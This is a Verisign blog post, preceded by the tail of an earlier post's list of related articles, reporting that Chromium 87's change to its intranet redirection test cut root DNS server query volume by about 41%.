  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post The Domain Name System: A Cryptographer’s Perspective appeared first on Verisign Blog.

Chromium’s Reduction of Root DNS Traffic

By Verisign

As we begin a new year, it is important to look back and reflect on our accomplishments and how we can continue to improve. One significant positive the DNS community can take from 2020 is the receptiveness and responsiveness of the Chromium team in addressing the large volume of DNS queries being sent to the root server system.

In a previous blog post, we quantified that upwards of 45.80% of total DNS traffic to the root servers was, at the time, the result of Chromium intranet redirection detection tests. Since then, the Chromium team has redesigned its code to disable the redirection test on Android systems and introduced a multi-state DNS interception policy that supports disabling the redirection test for desktop browsers. This functionality was released in mid-November 2020 for Android systems in Chromium 87 and, quickly thereafter, the root servers experienced a rapid decline in DNS query volume.

The figure below highlights the significant decline of query volume to the root server system immediately after the Chromium 87 release. Prior to the software release, the root server system saw peaks of ~143 billion queries per day. Traffic volumes have since decreased to ~84 billion queries a day. This represents more than a 41% reduction of total query volume.

Note: Some data from root operators was not available at the time of this publication.

This type of broad root system measurement is facilitated by ICANN’s Root Server System Advisory Committee standards document RSSAC002, which establishes a set of baseline metrics for the root server system. These root server metrics are readily available to the public for analysis, monitoring, and research. These metrics represent another milestone the DNS community could appreciate and continue to support and refine going forward.

As rightly noted in ICANN’s Root Name Service Strategy and Implementation publication, the root server system currently “faces growing volumes of traffic” not only from legitimate users but also from misconfigurations, misuse, and malicious actors, and “the costs incurred by the operators of the root server system continue to climb to mitigate these attacks using the traditional approach”.

As we reflect on how Chromium’s large impact on root server traffic was identified and then resolved, we as a DNS community could consider how outreach and engagement should be incorporated into the traditional approach to DNS security, stability, and resiliency. All too often, technologists solve problems by introducing additional layers of technology abstraction while disregarding simpler solutions, such as outreach and engagement.

We believe our efforts show how such outreach and community engagement can have a significant impact, both for the parties directly involved and for the broader community. Chromium’s actions will directly help ease the operational costs of mitigating attacks at the root. Reducing the root server system load by 41%, with potential further reduction depending on future Chromium deployment decisions, lowers the cost of mitigating attacks by freeing the computing and network resources that this traffic previously consumed.

In pursuit of maintaining a responsible and common-sense root hygiene regimen, Verisign will continue to analyze root telemetry data and engage with entities such as Chromium to highlight operational concerns, just as Verisign has done in the past to address name collision problems. We’ll be sharing more information on this shortly.

This piece was co-authored by Matt Thomas and Duane Wessels, Distinguished Engineers at Verisign.

The post Chromium’s Reduction of Root DNS Traffic appeared first on Verisign Blog.
